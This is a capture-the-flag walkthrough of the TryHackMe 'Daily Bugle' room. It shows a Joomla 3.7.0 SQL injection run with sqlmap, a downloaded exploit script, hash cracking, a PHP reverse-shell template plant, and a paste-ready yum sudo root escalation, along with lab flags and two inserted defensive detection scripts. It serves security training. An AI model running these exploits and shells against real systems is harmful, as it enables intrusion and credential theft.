Daily Bugle — TryHackMe Walkthrough: Joomla Exploitation & Red Hat Privilege Escalation
The article describes a penetration test against a Joomla 3.7.0 vulnerability, covering SQL injection, a reverse shell, SSH login and Red Hat Linux privilege escalation, ultimately obtaining user and root access. 2025-9-22 12:56:36 Author: infosecwriteups.com

Death Esther

Introduction

The Daily Bugle room on TryHackMe plunges you into a thrilling Red Team scenario centered around a high-profile bank heist. Your mission is to investigate and uncover the culprits while navigating a mix of web and system challenges. This room combines Joomla web exploitation, SQL injection, and Red Hat Linux privilege escalation, providing a full-spectrum test of both web application and server-level hacking skills. It’s a perfect exercise for penetration testers looking to sharpen their reconnaissance, exploitation, and privilege escalation techniques in a realistic, hands-on environment.

Initial reconnaissance

I started the box with a standard port and service scan to get my bearings.

nmap -sV -sC <ip>


Nmap returned three open ports:

  • 22/tcp — SSH (OpenSSH 7.4)
  • 80/tcp — HTTP (Apache/2.4.6, PHP 5.6.40) — the web server identified itself as Joomla!.
  • 3306/tcp — MySQL / MariaDB (unauthorized)

Port 80 was open, so I navigated to the web server to see what was exposed.


Question: Access the web server, who robbed the bank?
Answer: spiderman

Web enumeration

Next, I ran a directory brute-force with dirsearch to map out potential Joomla paths and locate an admin panel.

dirsearch -u <ip> -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt

Output highlights showed multiple Joomla-related directories and, importantly, an administrator interface:

  • /images/, /media/, /templates/, /modules/, /plugins/, /includes/, /language/, /components/, /cache/, /libraries/, /tmp/, /layouts/, /cli/
  • /administrator/ — Joomla admin panel discovered

Let’s navigate to the administrator panel next.


Finding Joomla Version

While dirsearch was running I noticed a README.txt file and grabbed it with curl to see if it revealed anything useful.

curl -s http://<ip>/README.txt

It confirmed the site was running Joomla 3.7.0, which is useful for targeting known vulnerabilities.

Question: What is the Joomla version?
Answer: 3.7.0

This is a useful data point: older Joomla 3.7.x installs are known to have several vulnerabilities, so next I moved on to vulnerability research.

Vulnerability research — SQL Injection

A known SQL injection (Exploit-DB 42033) affects Joomla 3.7’s com_fields component via the list[fullordering] parameter. I used sqlmap to verify the vulnerability and enumerate databases:

sqlmap -u "http://10.201.99.224/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" \
--risk=3 --level=5 --random-agent --dbs -p list[fullordering]

Output:

sqlmap identified the following injection point(s) with a total of 2547 HTTP(s) requests:
---
Parameter: list[fullordering] (GET)
Type: error-based
Title: MySQL >= 5.0 error-based - Parameter replace (FLOOR)
Payload: option=com_fields&view=fields&layout=modal&list[fullordering]=(SELECT 3813 FROM(SELECT COUNT(*),CONCAT(0x7162767671,(SELECT (ELT(3813=3813,1))),0x716b767a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)

Type: time-based blind
Title: MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)
Payload: option=com_fields&view=fields&layout=modal&list[fullordering]=(SELECT 7977 FROM (SELECT(SLEEP(5)))ODsF)
---
[09:31:02] [INFO] the back-end DBMS is MySQL
[09:31:02] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s)
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[09:31:03] [INFO] fetching database names
[09:31:03] [INFO] retrieved: 'information_schema'
[09:31:03] [INFO] retrieved: 'joomla'
[09:31:03] [INFO] retrieved: 'mysql'
[09:31:03] [INFO] retrieved: 'performance_schema'
[09:31:04] [INFO] retrieved: 'test'
available databases [5]:
[*] information_schema
[*] joomla
[*] mysql
[*] performance_schema
[*] test

[09:31:04] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 2507 times
[09:31:04] [INFO] fetched data logged to text files under '/root/.sqlmap/output/10.201.99.224'
[09:31:04] [WARNING] you haven't updated sqlmap for more than 1997 days!!!

[*] ending @ 09:31:04 /2025-09-21/

sqlmap confirmed the parameter was vulnerable and retrieved the following databases:

  • information_schema
  • joomla
  • mysql
  • performance_schema
  • test

The backend DBMS is MySQL (MariaDB fork). Many HTTP 500 responses appeared — typical for error-based payloads — and results were logged for further use.
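From the defender's side, the request pattern sqlmap produced above is what you would hunt for in web-server logs. The following Python script is an added example, not part of the original write-up: it parses Apache combined-format access log lines (constructed here, including the two payload shapes sqlmap reported, URL-encoded as a web server would log them) and flags com_fields requests whose list[fullordering] value does not look like a plain `column ASC|DESC` ordering. The allowed shape is an assumption for illustration, not Joomla's own validation logic, and the client addresses and user agents in the sample are made up.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed Apache combined-format access log lines (sample data, not from the write-up's
# target). Lines 2 and 3 carry the two payload shapes sqlmap reported, URL-encoded as a
# web server would log them; line 1 is a benign ordering request, line 4 is unrelated.
SAMPLE_LOG = """\
10.0.0.5 - - [21/Sep/2025:09:30:58 +0000] "GET /index.php?option=com_fields&view=fields&layout=modal&list%5Bfullordering%5D=a.title%20ASC HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.0.0.9 - - [21/Sep/2025:09:31:02 +0000] "GET /index.php?option=com_fields&view=fields&layout=modal&list%5Bfullordering%5D=updatexml HTTP/1.1" 500 1321 "-" "sqlmap/1.0"
10.0.0.9 - - [21/Sep/2025:09:31:02 +0000] "GET /index.php?option=com_fields&view=fields&layout=modal&list%5Bfullordering%5D=(SELECT%207977%20FROM%20(SELECT(SLEEP(5)))ODsF) HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.0.0.7 - - [21/Sep/2025:09:31:05 +0000] "GET /index.php?option=com_content&view=article&id=1 HTTP/1.1" 200 8000 "-" "Mozilla/5.0"
"""

# Apache combined format: client, identd, user, [timestamp], "method target protocol", status, ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Assumed benign shape of a list[fullordering] value: "<column> ASC|DESC".
# Illustrative allow-list only; it is not Joomla's own validation logic.
ORDERING_RE = re.compile(r'^[A-Za-z_][A-Za-z0-9_.]* (ASC|DESC)$', re.IGNORECASE)


def suspicious_ordering(value):
    """True when the ordering value does not match the expected column/direction shape."""
    return ORDERING_RE.match(value) is None


def scan(log_text):
    """Return one finding per com_fields request carrying an off-pattern list[fullordering]."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        # parse_qs percent-decodes keys and values, so list%5Bfullordering%5D -> list[fullordering]
        params = parse_qs(urlsplit(m["target"]).query)
        if params.get("option") != ["com_fields"]:
            continue
        for value in params.get("list[fullordering]", []):
            if suspicious_ordering(value):
                findings.append({
                    "ip": m["ip"],
                    "timestamp": m["ts"],
                    "status": int(m["status"]),
                    "ordering": value,
                })
    return findings


def by_client(findings):
    """Count flagged requests per client address; a sqlmap run produces hundreds of these."""
    counts = {}
    for f in findings:
        counts[f["ip"]] = counts.get(f["ip"], 0) + 1
    return counts


if __name__ == "__main__":
    hits = scan(SAMPLE_LOG)
    for h in hits:
        print(f'{h["timestamp"]} {h["ip"]} status={h["status"]} list[fullordering]={h["ordering"]!r}')
    print("flagged requests per client:", by_client(hits))
```

Pairing the per-client count with the burst of HTTP 500 responses sqlmap itself reported (2507 of them here) gives a second, payload-independent signal: error-based injection attempts leave a dense trail of server errors on a single endpoint from a single source.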

Exploit & admin hash extraction

I found an existing Joomla exploit and downloaded it:

wget https://raw.githubusercontent.com/stefanlucas/Exploit-Joomla/master/joomblah.py
python joomblah.py http://10.201.99.224/


This revealed Jonah’s password hash:

$2y$10$0veO/JSFh4389Lluc4Xya.dfy2MF.bZhz0jVMw.V.d3p12kBtZutm

I cracked it with John the Ripper using the RockYou wordlist:

john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt

Question: What is Jonah's cracked password?
Answer: spiderman123

Gaining Access — Joomla Admin & Reverse Shell

I logged in to the Joomla admin panel using Jonah’s credentials (jonah:spiderman123) via the /administrator directory.


Once inside, I navigated to Extensions > Templates > Templates and selected the Beez3 template.


To get a reverse shell, I cloned the PentestMonkey PHP reverse shell repository:

git clone https://github.com/pentestmonkey/php-reverse-shell.git
cd php-reverse-shell

I started a listener on my machine:

nc -lnvp 1234

Then I opened index.php in the Beez3 template, replaced its content with the PHP reverse shell (configured with my IP and port), and saved it.


Browsing to the modified template triggered the reverse shell:

curl http://10.201.99.224/templates/beez3/index.php

And my listener received the connection:

~$ nc -lnvp 1234
Connection received on 10.201.99.224 43182
sh-4.2$

I was now on the server as the apache user.

Post-Exploitation

First, I listed /home to see which users existed. The only user present was jjameson, but I didn’t have permission to access their home directory, so user.txt couldn’t be read at this stage.

Next, I inspected the web directory:

cd /var/www/html
cat configuration.php

The Joomla configuration.php file revealed database credentials:

public $user = 'root';
public $password = 'nv5uz9r3ZEDzVjNu';
public $db = 'joomla';
public $dbprefix = 'fb9j5_';

Capturing the User Flag

Interestingly, the database password (nv5uz9r3ZEDzVjNu) also worked for the user jjameson. I logged in via SSH:

ssh [email protected]
Password: nv5uz9r3ZEDzVjNu

Once inside, I retrieved the user flag:

cat user.txt
27a260fe3cba712cfdedb1c86d80442e

The machine is a Red Hat-based system.

Post-Exploitation — Privilege Escalation

I checked sudo privileges:

sudo -l

Output revealed that jjameson can run yum as root without a password:

(ALL) NOPASSWD: /usr/bin/yum

I verified the OS version:

cat /etc/redhat-release
CentOS Linux release 7.7.1908 (Core)

GTFOBins documents a privilege-escalation technique for exactly this situation: because jjameson can run yum via sudo without a password, a custom plugin loaded through a user-supplied configuration file runs arbitrary Python as root. I pasted the following code directly into the terminal:

TF=$(mktemp -d)
cat >$TF/x<<EOF
[main]
plugins=1
pluginpath=$TF
pluginconfpath=$TF
EOF

cat >$TF/y.conf<<EOF
[main]
enabled=1
EOF

cat >$TF/y.py<<EOF
import os
import yum
from yum.plugins import PluginYumExit, TYPE_CORE, TYPE_INTERACTIVE
requires_api_version='2.1'
def init_hook(conduit):
    os.execl('/bin/sh','/bin/sh')
EOF

sudo yum -c $TF/x --enableplugin=y

This gave me a root shell.
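On the defensive side, the rule that made this possible is one a periodic sudoers audit should catch. The script below is an added example, not part of the write-up: it parses sudoers-style rules from a constructed sample file (which includes jjameson's yum rule in its sudoers form; the other lines are made up) with the tag semantics sudo uses, where NOPASSWD applies to every following command in the list until a PASSWD tag resets it, and flags password-less rules for ALL or for binaries known, via GTFOBins, to hand back a shell. Only yum, the binary from this write-up, is in that set; it is meant to be extended.

```python
import re
from os.path import basename

# Constructed /etc/sudoers sample. The write-up shows only the `sudo -l` view of jjameson's
# rule, "(ALL) NOPASSWD: /usr/bin/yum"; the other lines are invented for illustration.
SAMPLE_SUDOERS = """\
# constructed sample, not the target's real file
Defaults    requiretty
root        ALL=(ALL)       ALL
%wheel      ALL=(ALL)       ALL
jjameson    ALL=(ALL)       NOPASSWD: /usr/bin/yum
deploy      ALL=(root)      NOPASSWD: /usr/bin/systemctl restart app, PASSWD: /usr/bin/yum
"""

# user_or_group  hosts = (runas) tagged command list
RULE_RE = re.compile(
    r'^(?P<who>\S+)\s+(?P<hosts>[^\s=]+)\s*=\s*(?:\((?P<runas>[^)]*)\)\s*)?(?P<cmds>.+)$'
)
# Tags that may prefix a command in a sudoers Cmnd list.
TAG_RE = re.compile(
    r'^(NOPASSWD|PASSWD|SETENV|NOSETENV|NOEXEC|EXEC|LOG_INPUT|NOLOG_INPUT|'
    r'LOG_OUTPUT|NOLOG_OUTPUT|MAIL|NOMAIL|FOLLOW|NOFOLLOW):\s*'
)

# Binaries whose password-less sudo rule is documented (GTFOBins) to yield a root shell.
# Only yum, the binary from this write-up, is listed; extend for your environment.
SHELL_CAPABLE = {"yum"}


def parse_rule(line):
    """Split one sudoers rule into per-command entries, carrying tags the way sudo does."""
    m = RULE_RE.match(line)
    if not m:
        return []
    entries = []
    nopasswd = False  # a tag stays in effect for the rest of the list until changed
    for item in m["cmds"].split(","):
        item = item.strip()
        tag = TAG_RE.match(item)
        while tag:
            if tag.group(1) == "NOPASSWD":
                nopasswd = True
            elif tag.group(1) == "PASSWD":
                nopasswd = False
            item = item[tag.end():]
            tag = TAG_RE.match(item)
        entries.append({
            "user": m["who"],
            "runas": m["runas"] if m["runas"] is not None else "root",  # sudoers default runas
            "nopasswd": nopasswd,
            "command": item,
        })
    return entries


def audit(sudoers_text):
    """Return the NOPASSWD entries that grant ALL or a shell-capable binary."""
    findings = []
    for raw in sudoers_text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line or line.startswith("Defaults"):
            continue
        for e in parse_rule(line):
            if not e["nopasswd"] or not e["command"]:
                continue
            binary = "ALL" if e["command"] == "ALL" else basename(e["command"].split()[0])
            if binary == "ALL" or binary in SHELL_CAPABLE:
                findings.append({**e, "binary": binary,
                                 "reason": "password-less sudo to a binary that can spawn a shell"})
    return findings


if __name__ == "__main__":
    for f in audit(SAMPLE_SUDOERS):
        print(f'{f["user"]}: NOPASSWD {f["command"]} (runas {f["runas"]}) -> {f["reason"]}')
```

The deploy line shows why tag tracking matters: the same binary, /usr/bin/yum, is harmless there because the PASSWD tag re-enables authentication for it, while systemctl stays password-less and is not flagged because it is not in the shell-capable set.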

Capturing the Root Flag

Finally, I read the root flag:

cat /root/root.txt
eec3d53292b1821868266858d7fa6f79

Conclusion

The Daily Bugle room on TryHackMe was a challenging Red Team exercise that tested both web and system exploitation skills. From Joomla vulnerabilities and SQL injection to deploying a PHP reverse shell and escalating privileges on Red Hat Linux via GTFOBins, I successfully captured both user and root flags. This room highlights the importance of thorough enumeration, vulnerability research, and creative privilege escalation — an excellent challenge for anyone honing penetration testing skills.



Source: https://infosecwriteups.com/daily-bugle-tryhackme-walkthrough-joomla-exploitation-red-hat-privilege-escalation-7e675a3cd706?source=rss----7b722bfd1b8d---4